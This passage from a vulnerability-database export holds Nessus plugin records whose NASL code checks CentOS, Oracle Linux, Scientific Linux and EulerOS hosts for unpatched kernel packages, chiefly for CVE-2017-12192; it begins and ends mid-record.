\"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", 
reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-18T15:02:14", "description": "The remote Redhat Enterprise Linux 6 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:2430 advisory.\n\n - kernel: NULL pointer dereference due to KEYCTL_READ on negative key (CVE-2017-12192)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-06-11T00:00:00", "type": "nessus", "title": "CentOS 6 : kernel (CESA-2020:2430)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12192"], "modified": "2020-06-18T00:00:00", "cpe": ["p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-abi-whitelists", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-debug-devel", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel-doc", "p-cpe:/a:centos:centos:kernel-firmware", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:perf", "p-cpe:/a:centos:centos:python-perf", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2020-2430.NASL", "href": "https://www.tenable.com/plugins/nessus/137336", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2020:2430 and \n# CentOS Errata and Security Advisory 2020:2430 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(137336);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/18\");\n\n 
script_cve_id(\"CVE-2017-12192\");\n script_xref(name:\"RHSA\", value:\"2020:2430\");\n\n script_name(english:\"CentOS 6 : kernel (CESA-2020:2430)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Redhat Enterprise Linux 6 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:2430 advisory.\n\n - kernel: NULL pointer dereference due to KEYCTL_READ on\n negative key (CVE-2017-12192)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2020-June/035753.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f272de0f\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12192\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-abi-whitelists-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-devel-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-devel-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-doc-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-firmware-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-headers-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perf-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"python-perf-2.6.32-754.30.2.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:01:57", "description": "The remote Oracle Linux 6 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2020-2430 advisory.\n\n - The keyctl_read_key function in security/keys/keyctl.c in the Key 
Management subcomponent in the Linux kernel before 4.13.5 does not properly consider that a key may be possessed but negatively instantiated, which allows local users to cause a denial of service (OOPS and system crash) via a crafted KEYCTL_READ operation. (CVE-2017-12192)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-06-11T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : kernel (ELSA-2020-2430)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12192"], "modified": "2021-09-08T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-firmware", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2020-2430.NASL", "href": "https://www.tenable.com/plugins/nessus/137346", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2020-2430.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137346);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/08\");\n\n script_cve_id(\"CVE-2017-12192\");\n script_xref(name:\"RHSA\", value:\"2020:2430\");\n\n script_name(english:\"Oracle Linux 6 : kernel (ELSA-2020-2430)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 6 host has packages installed that are affected by a vulnerability as referenced in 
the\nELSA-2020-2430 advisory.\n\n - The keyctl_read_key function in security/keys/keyctl.c in the Key Management subcomponent in the Linux\n kernel before 4.13.5 does not properly consider that a key may be possessed but negatively instantiated,\n which allows local users to cause a denial of service (OOPS and system crash) via a crafted KEYCTL_READ\n operation. (CVE-2017-12192)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2020-2430.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12192\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"linux_alt_patch_detect.nasl\", \"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('ksplice.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 6', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\nvar machine_uptrack_level = get_one_kb_item('Host/uptrack-uname-r');\nif (machine_uptrack_level)\n{\n var trimmed_uptrack_level = ereg_replace(string:machine_uptrack_level, pattern:\"\\.(x86_64|i[3-6]86|aarch64)$\", replace:'');\n var fixed_uptrack_levels = ['2.6.32-754.30.2.el6'];\n foreach var fixed_uptrack_level ( fixed_uptrack_levels ) {\n if (rpm_spec_vers_cmp(a:trimmed_uptrack_level, b:fixed_uptrack_level) >= 0)\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for ELSA-2020-2430');\n }\n }\n __rpm_report = 'Running KSplice level of ' + trimmed_uptrack_level + ' does not meet the minimum fixed level of ' + join(fixed_uptrack_levels, sep:' / ') + ' for this advisory.\\n\\n';\n}\n\nvar kernel_major_minor = get_kb_item('Host/uname/major_minor');\nif (empty_or_null(kernel_major_minor)) exit(1, 'Unable to determine kernel major-minor level.');\nvar expected_kernel_major_minor = '2.6';\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, 'running kernel level ' + expected_kernel_major_minor + ', it is running kernel level ' + kernel_major_minor);\n\nvar pkgs = [\n {'reference':'kernel-2.6.32-754.30.2.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-2.6.32'},\n {'reference':'kernel-2.6.32-754.30.2.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-2.6.32'},\n {'reference':'kernel-abi-whitelists-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-abi-whitelists-2.6.32'},\n {'reference':'kernel-debug-2.6.32-754.30.2.el6', 'cpu':'i686', 
'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-debug-2.6.32'},\n {'reference':'kernel-debug-2.6.32-754.30.2.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-debug-2.6.32'},\n {'reference':'kernel-debug-devel-2.6.32-754.30.2.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-debug-devel-2.6.32'},\n {'reference':'kernel-debug-devel-2.6.32-754.30.2.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-debug-devel-2.6.32'},\n {'reference':'kernel-devel-2.6.32-754.30.2.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-devel-2.6.32'},\n {'reference':'kernel-devel-2.6.32-754.30.2.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-devel-2.6.32'},\n {'reference':'kernel-firmware-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-firmware-2.6.32'},\n {'reference':'kernel-headers-2.6.32-754.30.2.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-headers-2.6.32'},\n {'reference':'kernel-headers-2.6.32-754.30.2.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-headers-2.6.32'},\n {'reference':'perf-2.6.32-754.30.2.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'perf-2.6.32-754.30.2.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python-perf-2.6.32-754.30.2.el6', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python-perf-2.6.32-754.30.2.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if 
(!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kernel / kernel-abi-whitelists / kernel-debug / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:02:00", "description": "Security Fix(es) :\n\n - kernel: NULL pointer dereference due to KEYCTL_READ on negative key (CVE-2017-12192)", "cvss3": {}, "published": "2020-06-11T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : kernel on SL6.x i386/x86_64 (20200610)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": 
["CVE-2017-12192"], "modified": "2020-12-23T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-i686", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:kernel-firmware", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:perf", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20200610_KERNEL_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/137347", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(137347);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/23\");\n\n script_cve_id(\"CVE-2017-12192\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL6.x i386/x86_64 (20200610)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Security Fix(es) :\n\n - kernel: NULL pointer dereference due to KEYCTL_READ on\n negative key (CVE-2017-12192)\"\n );\n # 
https://listserv.fnal.gov/scripts/wa.exe?A2=ind2006&L=SCIENTIFIC-LINUX-ERRATA&P=4349\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c6f9d851\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12192\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-firmware\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"kernel-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-abi-whitelists-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-debuginfo-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-devel-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debuginfo-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debuginfo-common-i686-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-devel-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-doc-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-firmware-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", 